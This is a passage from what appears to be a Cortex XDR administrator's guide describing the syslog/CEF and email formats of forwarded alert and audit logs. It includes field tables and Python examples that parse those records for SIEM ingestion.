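# Header Severity values this guide documents for Cortex XDR CEF output.
CEF_SEVERITY_NAMES = {0: "Unknown", 6: "Low", 8: "Medium", 9: "High"}

# RFC 5424: <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID STRUCTURED-DATA MSG
SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<version>\d+) (?P<timestamp>\S+) (?P<host>\S+) "
    r"\S+ \S+ \S+ \S+ (?P<msg>CEF:.*)$")
# One CEF header field: escaped pairs or non-pipe characters, up to an unescaped '|'.
HEADER_FIELD_RE = re.compile(r"((?:\\.|[^|\\])*)\|")
# An extension key is [A-Za-z0-9_.]+ followed by '=' at the start or after whitespace;
# an escaped '\=' inside a value never has that shape, so it stays part of the value.
KEY_RE = re.compile(r"(?:^|(?<=\s))([A-Za-z0-9_.]+)=")


def split_cef_header(msg):
    """Return the seven header fields (unescaped) and the remaining extension text."""
    fields, pos = [], 0
    for _ in range(7):
        m = HEADER_FIELD_RE.match(msg, pos)
        if not m:
            raise ValueError("CEF header needs 7 pipe-delimited fields")
        fields.append(re.sub(r"\\(.)", r"\1", m.group(1)))  # '\|' -> '|', '\\' -> '\'
        pos = m.end()
    return fields, msg[pos:]


def unescape_ext(value):
    """Extension escapes: '\\\\' -> '\\', '\\=' -> '=', '\\n' and '\\r' -> newline / CR."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "r": "\r"}.get(m[1], m[1]), value)


def parse_extension(ext):
    """Values may contain spaces (cs1Label=Initiated by), so each value runs up to
    the next key=, not the next space."""
    keys = list(KEY_RE.finditer(ext))
    out = {}
    for idx, m in enumerate(keys):
        end = keys[idx + 1].start() if idx + 1 < len(keys) else len(ext)
        out[m.group(1)] = unescape_ext(ext[m.end():end].strip())
    return out


def resolve_labels(ext):
    """Map csNLabel/cnNLabel text onto the matching csN/cnN value, so that
    cs2Label=subtype cs2=Stop becomes {'subtype': 'Stop'}."""
    labeled = {}
    for key, label in ext.items():
        m = re.fullmatch(r"(c[sn]\d+)Label", key)
        if m and m.group(1) in ext:
            labeled[label] = ext[m.group(1)]
    return labeled


def parse_cortex_syslog(line):
    """Decode one forwarded line into PRI parts, CEF header fields and extension."""
    m = SYSLOG_RE.match(line.strip())
    if not m:
        raise ValueError("not an RFC 5424 line carrying a CEF message")
    pri = int(m.group("pri"))
    hdr, ext_text = split_cef_header(m.group("msg"))
    if hdr[0] != "CEF:0":
        raise ValueError("unsupported CEF version: " + hdr[0])
    sev = int(hdr[6])
    ext = parse_extension(ext_text)
    return {"facility": pri // 8, "syslog_severity": pri % 8,
            "timestamp": m.group("timestamp"), "host": m.group("host"),
            "vendor": hdr[1], "product": hdr[2], "version": hdr[3],
            "event_class_id": hdr[4], "name": hdr[5], "severity": sev,
            "severity_name": CEF_SEVERITY_NAMES.get(sev, "Unknown"),
            "extension": ext, "labeled": resolve_labels(ext)}


# Constructed sample lines (placeholder values), one per forwarded log type.
ALERT_LINE = (
    "<177>1 2020-10-04T10:06:55.192016Z cortexxdr - - - - CEF:0|Palo Alto Networks|"
    "Cortex XDR|Cortex XDR 2.4|XDR Analytics|High Connection Rate|6|end=1601792870694 "
    "shost=WGHRAMG cat=Discovery externalId=98106342 cs1=iexplore.exe cs1Label=Initiated by "
    "cs2=\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\IEXPLORE.EXE\" /prefetch:2 "
    "cs2Label=Initiator CMD dst=10.12.4.37 dpt=8000 src=10.10.28.140 spt=58003 "
    "incident=118719 act=Detected")
AGENT_AUDIT_LINE = (
    "<182>1 2020-10-04T10:41:14.608731Z cortexxdr - - - - CEF:0|Palo Alto Networks|"
    "Cortex XDR Agent|Cortex XDR Agent 7.2.0.63060|Agent Audit Logs|Agent Service|9|"
    "dvchost=WORKGROUP shost=Test-Agent cat=Monitoring end=1601808073102 cs1Label=agentversion "
    "cs1=7.2.0.63060 cs2Label=subtype cs2=Stop cs3Label=result cs3=N/A cs4Label=reason "
    "cs4=None msg=XDR service cyserver was stopped on Test-Agent tenantname=Test")
MGMT_AUDIT_LINE = (
    "<14>1 2020-03-18T12:05:17.567590Z cortexxdr - - - - CEF:0|Palo Alto Networks|"
    "Cortex XDR|Cortex XDR 2.4|Management Audit Logs|REPORTING|6|suser=test "
    "end=1584533117501 externalId=5820 cs1Label=email cs1=admin@example.test "
    "cs2Label=subtype cs2=Slack Report cs3Label=result cs3=SUCCESS cs4Label=reason "
    "cs4=None msg=Report scheduled_1584533112442 ID\\=00 sent tenantname=test")

if __name__ == "__main__":
    print([parse_cortex_syslog(l)["labeled"] for l in (ALERT_LINE, AGENT_AUDIT_LINE, MGMT_AUDIT_LINE)])
```

The resolved labels are what a SIEM mapping should key on: "Initiated by", "subtype", "result" and "reason" are stable names, while the csN slot that carries them differs between the alert and audit layouts.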

Cortex XDR Log Format for IOC and BIOC Alerts


Cortex XDR™ logs its IOC and BIOC alerts to the Cortex Data Lake. If you configure Cortex XDR to forward
logs in legacy format, when alert logs are forwarded from Cortex Data Lake, each log record has the
following format:
Syslog format:

"/edrData/action_country","/edrData/action_download","/edrData/
action_external_hostname","/edrData/action_external_port","/
edrData/action_file_extension","/edrData/action_file_md5","/
edrData/action_file_name","/edrData/action_file_path","/
edrData/action_file_previous_file_extension","/edrData/
action_file_previous_file_name","/edrData/action_file_previous_file_path","/
edrData/action_file_sha256","/edrData/action_file_size","/edrData/
action_file_remote_ip","/edrData/action_file_remote_port","/edrData/
action_is_injected_thread","/edrData/action_local_ip","/edrData/
action_local_port","/edrData/action_module_base_address","/edrData/
action_module_image_size","/edrData/action_module_is_remote","/
edrData/action_module_is_replay","/edrData/action_module_path","/
edrData/action_module_process_causality_id","/
edrData/action_module_process_image_command_line","/
edrData/action_module_process_image_extension","/
edrData/action_module_process_image_md5","/edrData/
action_module_process_image_name","/edrData/
action_module_process_image_path","/edrData/
action_module_process_image_sha256","/edrData/
action_module_process_instance_id","/edrData/
action_module_process_is_causality_root","/edrData/
action_module_process_os_pid","/edrData/
action_module_process_signature_product","/edrData/
action_module_process_signature_status","/edrData/
action_module_process_signature_vendor","/edrData/
action_network_connection_id","/edrData/action_network_creation_time","/
edrData/action_network_is_ipv6","/edrData/action_process_causality_id","/
edrData/action_process_image_command_line","/edrData/
action_process_image_extension","/edrData/action_process_image_md5","/edrData/
action_process_image_name","/edrData/action_process_image_path","/edrData/
action_process_image_sha256","/edrData/action_process_instance_id","/edrData/
action_process_integrity_level","/edrData/action_process_is_causality_root","/
edrData/action_process_is_replay","/edrData/action_process_is_special","/
edrData/action_process_os_pid","/edrData/action_process_signature_product","/
edrData/action_process_signature_status","/edrData/
action_process_signature_vendor","/edrData/action_proxy","/edrData/
action_registry_data","/edrData/action_registry_file_path","/edrData/
action_registry_key_name","/edrData/action_registry_value_name","/
edrData/action_registry_value_type","/edrData/action_remote_ip","/edrData/
action_remote_port","/edrData/action_remote_process_causality_id","/
edrData/action_remote_process_image_command_line","/
edrData/action_remote_process_image_extension","/
edrData/action_remote_process_image_md5","/edrData/
action_remote_process_image_name","/edrData/
action_remote_process_image_path","/edrData/
action_remote_process_image_sha256","/edrData/
action_remote_process_is_causality_root","/edrData/
action_remote_process_os_pid","/edrData/
action_remote_process_signature_product","/edrData/

action_remote_process_signature_status","/edrData/
action_remote_process_signature_vendor","/edrData/
action_remote_process_thread_id","/edrData/
action_remote_process_thread_start_address","/edrData/
action_thread_thread_id","/edrData/action_total_download","/edrData/
action_total_upload","/edrData/action_upload","/edrData/action_user_status","/
edrData/action_username","/edrData/actor_causality_id","/edrData/
actor_effective_user_sid","/edrData/actor_effective_username","/edrData/
actor_is_injected_thread","/edrData/actor_primary_user_sid","/edrData/
actor_primary_username","/edrData/actor_process_causality_id","/edrData/
actor_process_command_line","/edrData/actor_process_execution_time","/edrData/
actor_process_image_command_line","/edrData/actor_process_image_extension","/
edrData/actor_process_image_md5","/edrData/actor_process_image_name","/
edrData/actor_process_image_path","/edrData/actor_process_image_sha256","/
edrData/actor_process_instance_id","/edrData/actor_process_integrity_level","/
edrData/actor_process_is_special","/edrData/actor_process_os_pid","/edrData/
actor_process_signature_product","/edrData/actor_process_signature_status","/
edrData/actor_process_signature_vendor","/edrData/actor_thread_thread_id","/
edrData/agent_content_version","/edrData/agent_host_boot_time","/edrData/
agent_hostname","/edrData/agent_id","/edrData/agent_ip_addresses","/edrData/
agent_is_vdi","/edrData/agent_os_sub_type","/edrData/agent_os_type","/
edrData/agent_session_start_time","/edrData/agent_version","/edrData/
causality_actor_causality_id","/edrData/causality_actor_effective_user_sid","/
edrData/causality_actor_effective_username","/
edrData/causality_actor_primary_user_sid","/edrData/
causality_actor_primary_username","/edrData/
causality_actor_process_causality_id","/edrData/
causality_actor_process_command_line","/edrData/
causality_actor_process_execution_time","/edrData/
causality_actor_process_image_command_line","/
edrData/causality_actor_process_image_extension","/
edrData/causality_actor_process_image_md5","/edrData/
causality_actor_process_image_name","/edrData/
causality_actor_process_image_path","/edrData/
causality_actor_process_image_sha256","/edrData/
causality_actor_process_instance_id","/edrData/
causality_actor_process_integrity_level","/edrData/
causality_actor_process_is_special","/edrData/
causality_actor_process_os_pid","/edrData/
causality_actor_process_signature_product","/edrData/
causality_actor_process_signature_status","/edrData/
causality_actor_process_signature_vendor","/edrData/event_id","/
edrData/event_is_simulated","/edrData/event_sub_type","/edrData/
event_timestamp","/edrData/event_type","/edrData/event_utc_diff_minutes","/
edrData/event_version","/edrData/host_metadata_hostname","/edrData/
missing_action_remote_process_instance_id","/facility","/generatedTime","/
recordType","/recsize","/trapsId","/uuid","/xdr_unique_id","/
meta_internal_id","/external_id","/is_visible","/is_secdo_event","/
severity","/alert_source","/internal_id","/matching_status","/
local_insert_ts","/source_insert_ts","/alert_name","/alert_category","/
alert_description","/bioc_indicator","/matching_service_rule_id","/
external_url","/xdr_sub_type","/bioc_category_enum_key","/
alert_action_status","/agent_data_collection_status","/attempt_counter","/
case_id","/global_content_version_id","/global_rule_id","/is_whitelisted"

When alert logs are forwarded by email, each field is labeled, one line per field:
Email body format example:

edrData/action_country:
edrData/action_download:

edrData/action_external_hostname:
edrData/action_external_port:
edrData/action_file_extension: pdf
edrData/action_file_md5: null
edrData/action_file_name: XORXOR2614081980.pdf
edrData/action_file_path: C:\ProgramData\Cyvera\Ransomware
\16067987696371268494\XORXOR2614081980.pdf
edrData/action_file_previous_file_extension: null
edrData/action_file_previous_file_name: null
edrData/action_file_previous_file_path: null
edrData/action_file_sha256: null
edrData/action_file_size: 0
edrData/action_file_remote_ip: null
edrData/action_file_remote_port: null
edrData/action_is_injected_thread:
edrData/action_local_ip:
edrData/action_local_port:
edrData/action_module_base_address:
edrData/action_module_image_size:
edrData/action_module_is_remote:
edrData/action_module_is_replay:
edrData/action_module_path:
edrData/action_module_process_causality_id:
edrData/action_module_process_image_command_line:
edrData/action_module_process_image_extension:
edrData/action_module_process_image_md5:
edrData/action_module_process_image_name:
edrData/action_module_process_image_path:
edrData/action_module_process_image_sha256:
edrData/action_module_process_instance_id:
edrData/action_module_process_is_causality_root:
edrData/action_module_process_os_pid:
edrData/action_module_process_signature_product:
edrData/action_module_process_signature_status:
edrData/action_module_process_signature_vendor:
edrData/action_network_connection_id:
edrData/action_network_creation_time:
edrData/action_network_is_ipv6:
edrData/action_process_causality_id:
edrData/action_process_image_command_line:
edrData/action_process_image_extension:
edrData/action_process_image_md5:
edrData/action_process_image_name:
edrData/action_process_image_path:
edrData/action_process_image_sha256:
edrData/action_process_instance_id:
edrData/action_process_integrity_level:
edrData/action_process_is_causality_root:
edrData/action_process_is_replay:
edrData/action_process_is_special:
edrData/action_process_os_pid:
edrData/action_process_signature_product:
edrData/action_process_signature_status:
edrData/action_process_signature_vendor:
edrData/action_proxy:
edrData/action_registry_data:
edrData/action_registry_file_path:
edrData/action_registry_key_name:
edrData/action_registry_value_name:
edrData/action_registry_value_type:
edrData/action_remote_ip:
edrData/action_remote_port:

edrData/action_remote_process_causality_id:
edrData/action_remote_process_image_command_line:
edrData/action_remote_process_image_extension:
edrData/action_remote_process_image_md5:
edrData/action_remote_process_image_name:
edrData/action_remote_process_image_path:
edrData/action_remote_process_image_sha256:
edrData/action_remote_process_is_causality_root:
edrData/action_remote_process_os_pid:
edrData/action_remote_process_signature_product:
edrData/action_remote_process_signature_status:
edrData/action_remote_process_signature_vendor:
edrData/action_remote_process_thread_id:
edrData/action_remote_process_thread_start_address:
edrData/action_thread_thread_id:
edrData/action_total_download:
edrData/action_total_upload:
edrData/action_upload:
edrData/action_user_status:
edrData/action_username:
edrData/actor_causality_id: AdUcamNT99kAAAAEAAAAAA==
edrData/actor_effective_user_sid: S-1-5-18
edrData/actor_effective_username: NT AUTHORITY\SYSTEM
edrData/actor_is_injected_thread: false
edrData/actor_primary_user_sid: S-1-5-18
edrData/actor_primary_username: NT AUTHORITY\SYSTEM
edrData/actor_process_causality_id: AdUcamNT99kAAAAEAAAAAA==
edrData/actor_process_command_line:
edrData/actor_process_execution_time: 1559827133585
edrData/actor_process_image_command_line:
edrData/actor_process_image_extension:
edrData/actor_process_image_md5:
edrData/actor_process_image_name: System
edrData/actor_process_image_path: System
edrData/actor_process_image_sha256:
edrData/actor_process_instance_id: AdUcamNT99kAAAAEAAAAAA==
edrData/actor_process_integrity_level: 16384
edrData/actor_process_is_special: 1
edrData/actor_process_os_pid: 4
edrData/actor_process_signature_product: Microsoft Windows
edrData/actor_process_signature_status: 1
edrData/actor_process_signature_vendor: Microsoft Corporation
edrData/actor_thread_thread_id: 64
edrData/agent_content_version: 58-9124
edrData/agent_host_boot_time: 1559827133585
edrData/agent_hostname: padme-7
edrData/agent_id: a832f35013f16a06fc2495843674a3e9
edrData/agent_ip_addresses: ["10.196.172.74"]
edrData/agent_is_vdi: false
edrData/agent_os_sub_type: Windows 7 [6.1 (Build 7601: Service Pack 1)]
edrData/agent_os_type: 1
edrData/agent_session_start_time: 1559827592661
edrData/agent_version: 6.1.0.13895
edrData/causality_actor_causality_id: AdUcamNT99kAAAAEAAAAAA==
edrData/causality_actor_effective_user_sid:
edrData/causality_actor_effective_username:
edrData/causality_actor_primary_user_sid: S-1-5-18
edrData/causality_actor_primary_username: NT AUTHORITY\SYSTEM
edrData/causality_actor_process_causality_id:
edrData/causality_actor_process_command_line:
edrData/causality_actor_process_execution_time: 1559827133585
edrData/causality_actor_process_image_command_line:

edrData/causality_actor_process_image_extension:
edrData/causality_actor_process_image_md5:
edrData/causality_actor_process_image_name: System
edrData/causality_actor_process_image_path: System
edrData/causality_actor_process_image_sha256:
edrData/causality_actor_process_instance_id: AdUcamNT99kAAAAEAAAAAA==
edrData/causality_actor_process_integrity_level: 16384
edrData/causality_actor_process_is_special: 1
edrData/causality_actor_process_os_pid: 4
edrData/causality_actor_process_signature_product: Microsoft Windows
edrData/causality_actor_process_signature_status: 1
edrData/causality_actor_process_signature_vendor: Microsoft Corporation
edrData/event_id: AAABa13u2PQsqXnCAB1qjw==
edrData/event_is_simulated: false
edrData/event_sub_type: 1
edrData/event_timestamp: 1560649063308
edrData/event_type: 3
edrData/event_utc_diff_minutes: 120
edrData/event_version: 20
edrData/host_metadata_hostname:
edrData/missing_action_remote_process_instance_id:
facility:
generatedTime: 2019-06-16T01:37:43
recordType: alert
recsize:
trapsId:
uuid:
xdr_unique_id: ae65c92c6e704023df129c728eab3d3e
meta_internal_id: None
external_id: 318b7f91-ae74-4860-abd1-b463e8cd6deb
is_visible: null
is_secdo_event: null
severity: SEV_010_INFO
alert_source: BIOC
internal_id: None
matching_status: null
local_insert_ts: null
source_insert_ts: 1560649063308
alert_name: BIOC-16
alert_category: CREDENTIAL_ACCESS
alert_description: File action type = all AND name = *.pdf
bioc_indicator:
"[{""pretty_name"":""File"",""data_type"":null,""render_type"":""entity"",
""entity_map"":null},{""pretty_name"":""action type"",""data_type"":null,
""render_type"":""attribute"",""entity_map"":null},{""pretty_name"":""="",
""data_type"":null,""render_type"":""operator"",""entity_map"":null},
{""pretty_name"":""all"",""data_type"":null,""render_type"":""value"",
""entity_map"":null},{""pretty_name"":""AND"",""data_type"":null,
""render_type"":""connector"",""entity_map"":null},
{""pretty_name"":""name"",""data_type"":""TEXT"",
""render_type"":""attribute"",""entity_map"":""attributes""},
{""pretty_name"":""="",""data_type"":null,""render_type"":""operator"",
""entity_map"":""attributes""},{""pretty_name"":""*.pdf"",
""data_type"":null,""render_type"":""value"",
""entity_map"":""attributes""}]"
matching_service_rule_id: 200
external_url: null
xdr_sub_type: BIOC - Credential Access
bioc_category_enum_key: null
alert_action_status: null
agent_data_collection_status: null
attempt_counter: null

456 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding


© 2020 Palo Alto Networks, Inc.
case_id: null
global_content_version_id:
global_rule_id:
is_whitelisted: false

The following table summarizes the field prefixes and additional relevant fields available for BIOC and IOC
alert logs.

Field Name  Definition

/edrData/action_file*  Fields that begin with this prefix describe attributes of a file for which Traps reported activity.

edrData/action_module*  Fields that begin with this prefix describe attributes of a module for which Traps reported module loading activity.

edrData/action_module_process*  Fields that begin with this prefix describe attributes and activity related to processes reported by Traps that load modules, such as DLLs, on the endpoint.

edrData/action_process_image*  Fields that begin with this prefix describe attributes of a process image for which Traps reported activity.

edrData/action_registry*  Fields that begin with this prefix describe registry activity and attributes, such as key name, data, and previous value, for which Traps reported activity.

edrData/action_network  Fields that begin with this prefix describe network attributes for which Traps reported activity.

edrData/action_remote_process*  Fields that begin with this prefix describe attributes of remote processes for which Traps reported activity.

edrData/actor*  Fields that begin with this prefix describe attributes of the acting user that initiated the activity on the endpoint.

edrData/agent*  Fields that begin with this prefix describe attributes of the Traps agent deployed on the endpoint.

edrData/causality_actor*  Fields that begin with this prefix describe attributes of the causality group owner.

Additional useful fields:

/severity  Severity assigned to the alert:
• SEV_010_INFO
• SEV_020_LOW
• SEV_030_MEDIUM
• SEV_040_HIGH
• SEV_090_UNKNOWN

/alert_source  Source of the alert: BIOC or IOC.

/local_insert_ts  Date and time when Cortex XDR – Investigation and Response ingested the alert.

/source_insert_ts  Date and time the alert was reported by the alert source.

/alert_name  If the alert was generated by Cortex XDR – Investigation and Response, the alert name is the specific Cortex XDR rule that created the alert (BIOC or IOC rule name). If the alert came from an external system, it carries the name assigned to it by Cortex XDR.

/alert_category  Alert category based on the alert source.
• BIOC alert categories:
  • OTHER
  • PERSISTENCE
  • EVASION
  • TAMPERING
  • FILE_TYPE_OBFUSCATION
  • PRIVILEGE_ESCALATION
  • CREDENTIAL_ACCESS
  • LATERAL_MOVEMENT
  • EXECUTION
  • COLLECTION
  • EXFILTRATION
  • INFILTRATION
  • DROPPER
  • FILE_PRIVILEGE_MANIPULATION
  • RECONNAISSANCE
• IOC alert categories:
  • HASH
  • IP
  • PATH
  • DOMAIN_NAME
  • FILENAME
  • MIXED

/alert_description  Text summary of the event, including the alert source, alert name, severity, and file path. For alerts triggered by BIOC and IOC rules, Cortex XDR displays detailed information about the rule.

/bioc_indicator  A JSON representation of the rule characteristics. For example:

[{""pretty_name"":""File"",""data_type"":null,""render_type"":""entity"",""entity_map"":null},
{""pretty_name"":""action type"",""data_type"":null,""render_type"":""attribute"",""entity_map"":null},
{""pretty_name"":""="",""data_type"":null,""render_type"":""operator"",""entity_map"":null},
{""pretty_name"":""all"",""data_type"":null,""render_type"":""value"",""entity_map"":null},
{""pretty_name"":""AND"",""data_type"":null,""render_type"":""connector"",""entity_map"":null},
{""pretty_name"":""name"",""data_type"":""TEXT"",""render_type"":""attribute"",""entity_map"":""attributes""},
{""pretty_name"":""="",""data_type"":null,""render_type"":""operator"",""entity_map"":""attributes""},
{""pretty_name"":""*.pdf"",""data_type"":null,""render_type"":""value"",""entity_map"":""attributes""}]"

/bioc_category_enum_key  Alert category based on the alert source. An example of a BIOC alert category is Evasion. An example of a Traps alert category is Exploit Modules.

/alert_action_status  Action taken by the alert sensor, with the action status displayed in parentheses:
• Detected
• Detected (Download)
• Detected (Post Detected)
• Detected (Prompt Allow)
• Detected (Reported)
• Detected (Scanned)
• Prevented (Blocked)
• Prevented (Prompt Block)

/case_id  Unique identifier for the incident.

/global_content_version_id  Unique identifier for the content version in which a Palo Alto Networks global BIOC rule was released.

/global_rule_id  Unique identifier for an alert triggered by a Palo Alto Networks global BIOC rule.

/is_whitelisted  Boolean indicating whether the alert is excluded.
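As an added example (not code from the guide or from Palo Alto Networks), the following Python reads a BIOC alert log in the email-body layout shown above, undoes the CSV quoting that the bioc_indicator field carries, and rebuilds the rule text from the pretty_name tokens so it can be checked against alert_description. The sample record is constructed from the fields listed in this section; the field-name pattern, the handling of a value wrapped onto following lines, and the helper names (parse_email_body, decode_csv_quoted, summarize_alert) are assumptions made here, not something the guide specifies.

```python
import json
import re

# Constructed sample in the email-body layout (one "key: value" per line; a value
# the forwarder wraps onto following lines continues the previous field). The
# bioc_indicator JSON keeps the CSV-style doubled quotes of the forwarded log.
SAMPLE_BIOC_ALERT = """\
recordType: alert
xdr_unique_id: ae65c92c6e704023df129c728eab3d3e
severity: SEV_010_INFO
alert_source: BIOC
alert_name: BIOC-16
alert_category: CREDENTIAL_ACCESS
alert_description: File action type = all AND name = *.pdf
bioc_indicator:
"[{""pretty_name"":""File"",""data_type"":null,""render_type"":""entity"",""entity_map"":null},
{""pretty_name"":""action type"",""data_type"":null,""render_type"":""attribute"",""entity_map"":null},
{""pretty_name"":""="",""data_type"":null,""render_type"":""operator"",""entity_map"":null},
{""pretty_name"":""all"",""data_type"":null,""render_type"":""value"",""entity_map"":null},
{""pretty_name"":""AND"",""data_type"":null,""render_type"":""connector"",""entity_map"":null},
{""pretty_name"":""name"",""data_type"":""TEXT"",""render_type"":""attribute"",""entity_map"":""attributes""},
{""pretty_name"":""="",""data_type"":null,""render_type"":""operator"",""entity_map"":""attributes""},
{""pretty_name"":""*.pdf"",""data_type"":null,""render_type"":""value"",""entity_map"":""attributes""}]"
matching_service_rule_id: 200
xdr_sub_type: BIOC - Credential Access
case_id: null
is_whitelisted: false
"""

# Assumed layout: a field line is "<name>:" optionally followed by a space and the
# value; names use word characters, "/", "." and "-". Anything else continues the
# previous field's value.
_FIELD_RE = re.compile(r"^([A-Za-z_][\w/.-]*):(?: (.*))?$")


def parse_email_body(body):
    """Parse the one-field-per-line email body into {field name: raw string}."""
    fields = {}
    last_key = None
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = _FIELD_RE.match(line)
        if match:
            last_key = match.group(1)
            fields[last_key] = match.group(2) or ""
        elif last_key is not None:
            fields[last_key] += line  # wrapped value: glue onto the previous field
        else:
            raise ValueError(f"unexpected line before any field: {line!r}")
    return fields


def decode_csv_quoted(value):
    """Undo CSV quoting on a forwarded JSON field: drop the outer pair of double
    quotes and collapse each doubled inner quote back to a single one."""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1].replace('""', '"')
    return value


def parse_bioc_indicator(fields):
    """Return bioc_indicator as a list of rule tokens (dicts), or [] if absent."""
    raw = fields.get("bioc_indicator", "")
    return json.loads(decode_csv_quoted(raw)) if raw else []


def render_rule(indicator):
    """Rebuild the human-readable rule from the tokens' pretty_name values."""
    return " ".join(token["pretty_name"] for token in indicator)


def severity_rank(severity):
    """SEV_040_HIGH -> 40. SEV_090_UNKNOWN yields None: unknown is not 'above high'."""
    _, number, name = severity.split("_", 2)
    return None if name == "UNKNOWN" else int(number)


def summarize_alert(fields):
    """Pick the fields an analyst triages on and cross-check the indicator JSON
    against the alert_description text."""
    indicator = parse_bioc_indicator(fields)
    rule_text = render_rule(indicator)
    return {
        "source": fields.get("alert_source", ""),
        "name": fields.get("alert_name", ""),
        "category": fields.get("alert_category", ""),
        "severity_rank": severity_rank(fields.get("severity", "SEV_090_UNKNOWN")),
        "rule": rule_text,
        "rule_matches_description": rule_text == fields.get("alert_description", ""),
        "whitelisted": fields.get("is_whitelisted", "").lower() == "true",
        "attributes": [t["pretty_name"] for t in indicator if t["render_type"] == "attribute"],
    }


if __name__ == "__main__":
    print(json.dumps(summarize_alert(parse_email_body(SAMPLE_BIOC_ALERT)), indent=2))
```

The indicator tokens carry a render_type (entity, attribute, operator, value, connector), so a consumer can pull out just the attributes a rule keys on (here "action type" and "name") without parsing the free-text description.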

Cortex XDR Analytics Log Format
Cortex XDR™ Analytics logs its alerts to the Cortex Data Lake as analytics alert logs. If you configure Cortex
XDR to forward logs in legacy format, each log record has the following format:
Syslog format:

sub_type,time_generated,id,version_info/document_version,version_info/
magnifier_version,version_info/detection_version,alert/url,alert/
category,alert/type,alert/name,alert/description/html,alert/description/
text,alert/severity,alert/state,alert/is_whitelisted,alert/ports,alert/
internal_destinations/single_destinations,alert/internal_destinations/
ip_ranges,alert/external_destinations,alert/app_id,alert/schedule/
activity_first_seen_at,alert/schedule/activity_last_seen_at,alert/schedule/
first_detected_at,alert/schedule/last_detected_at,user/user_name,user/
url,user/display_name,user/org_unit,device/id,device/url,device/mac,device/
hostname,device/ip,device/ip_ranges,device/owner,device/org_unit,files

Email body format example:

When analytics alert logs are forwarded by email, each field is labeled, one line per field:

sub_type: Update
time_generated: 1547717480
id: 4
version_info/document_version: 1
version_info/magnifier_version: 1.8
version_info/detection_version: 2019.2.0rc1
alert/url: https:\/\/ddc1...
alert/category: Recon
alert/type: Port Scan
alert/name: Port Scan
alert/description/html: \t<ul>\n\t\t<li>The device....
alert/description/text: The device ...
alert/severity: Low
alert/state: Reopened
alert/is_whitelisted: false
alert/ports: "[1,2,3,4,5,6,7,8,9,10,11...]
alert/internal_destinations/single_destinations: []
alert/internal_destinations/ip_ranges:
"[{""max_ip"":""..."",""name"":""..."",""min_ip"":""...""}]"
alert/external_destinations: []
alert/app_id:
alert/schedule/activity_first_seen_at: 1542178800
alert/schedule/activity_last_seen_at: 1542182400
alert/schedule/first_detected_at: 1542182400
alert/schedule/last_detected_at: 1542182400
user/user_name:
user/url:
user/display_name:
user/org_unit:
device/id: 2-85e40edd-b2d1-1f25-2c1e-a3dd576c8a7e
device/url: https:\/\/ddc1 ...
device/mac: 00-50-56-a5-db-b2
device/hostname: DC1ENV3APC42
device/ip: 10.201.102.17
device/ip_ranges:
"[{""max_ip"":""..."",""name"":""..."",""min_ip"":""..."",""asset"":""""}]"
device/owner:
device/org_unit:

files: []

The following table describes each field:

Field Name  Definition

sub_type  Alert log subtype. Values are:
• New—First log record for the alert with this record id.
• Update—Log record identifies an update to a previously logged alert.
• StateOnlyUpdate—Alert state is updated. For internal use only.

time_generated  Time the log record was sent to the Cortex Data Lake. Value is a Unix Epoch timestamp.

id  Unique identifier for the alert. Any given alert can generate multiple log records—one when the alert is initially raised, and then additional records every time the alert status changes. This ID remains constant for all such alert records. You can obtain the current status of the alert by looking for log records with this id and the most recent alert/schedule/last_detected_at timestamp.

version_info/document_version  Identifies the log schema version number used for this log record.

version_info/magnifier_version  The version number of the Cortex XDR – Analytics instance that wrote this log record.

version_info/detection_version  Identifies the version of the Cortex XDR – Analytics detection software used to raise the alert.

alert/url  Provides the full URL to the alert page in the Cortex XDR – Analytics user interface.

alert/category  Identifies the alert category, which reflects where in the attack life cycle the anomalous network activity falls. Possible categories are:
• C&C—The network activity is possibly the result of malware attempting to connect to its Command & Control server.
• Exfiltration—A large amount of data is being transferred to an endpoint that is external to the network.
• Lateral—The network activity is indicative of an attacker who is attempting to move from one endpoint to another on the network.
• Malware—A file has been discovered on an endpoint that is probably malware or riskware. Malware alerts can also be raised based on network activity that is indicative of automated malicious traffic generation.
• Recon—The network activity is indicative of an attacker who is exploring the network for endpoints and other resources to attack.

alert/type  Identifies the categorization to which the alert belongs, for example Tunneling Process, Sandbox Detection, or Malware.

alert/name  The alert name as it appears in the Cortex XDR – Analytics user interface.

alert/description/html  The alert textual description in HTML formatting.

alert/description/text  The alert textual description in plain text.

alert/severity  Identifies the alert severity. These severities indicate the likelihood that the anomalous network activity is a real attack.
• High—The alert is confirmed to be a network attack.
• Medium—The alert is suspicious enough to require additional investigation.
• Low—The alert is unverified. Whether the alert is indicative of a network attack is unknown.

alert/state  Identifies the alert state.
• Open—The alert is currently active and should be undergoing triage or investigation by the network security analysts.
• Reopened—The alert was previously resolved or dismissed, but new network activity has caused Cortex XDR – Analytics to reopen the alert.
• Archived—No action was taken on the alert in the Cortex XDR – Analytics user interface, and no further network activity has occurred that caused it to remain active.
• Resolved—Network personnel have taken enough action to end the attack.
• Dismissed—The anomaly has been examined and deemed to be normal, sanctioned network activity.

alert/is_whitelisted  Indicates whether the alert is whitelisted. Whitelisting indicates that anomalous-appearing network activity is legitimate. If an alert is whitelisted, it is not visible in the Cortex XDR Analytics user interface. Alerts can be dismissed or archived and still have a whitelist rule.

alert/ports  List of ports accessed by the network entity during its anomalous behavior.

alert/internal_destinations/single_destinations  Network destinations that the entity reached, or tried to reach, during the course of the network activity that caused Cortex XDR – Analytics to raise the alert. This field contains a sequence of JSON objects, each of which contains the following fields:
• ip—The destination IP address.
• name—The destination name (for example, a host name).

alert/internal_destinations/ip_ranges  IP address range subnets that the entity reached, or tried to reach, during the course of the network activity that caused Cortex XDR – Analytics to raise the alert. This field contains a sequence of JSON objects, each of which contains the following fields:
• max_ip—Last IP address in the subnet.
• min_ip—First IP address in the subnet.
• name—Subnet name.

alert/external_destinations  Provides a list of destinations external to the monitored network that the entity tried to reach, or actually reached, during the activity that raised this alert. This list can contain IP addresses or fully qualified domain names.

alert/app_id  The App-ID associated with this alert.

alert/schedule/activity_first_seen_at  Time when Cortex XDR – Analytics first detected the network activity that caused it to raise the alert. Be aware that there is frequently a delay between this timestamp and the time when Cortex XDR – Analytics raises an alert (see the alert/schedule/first_detected_at field).

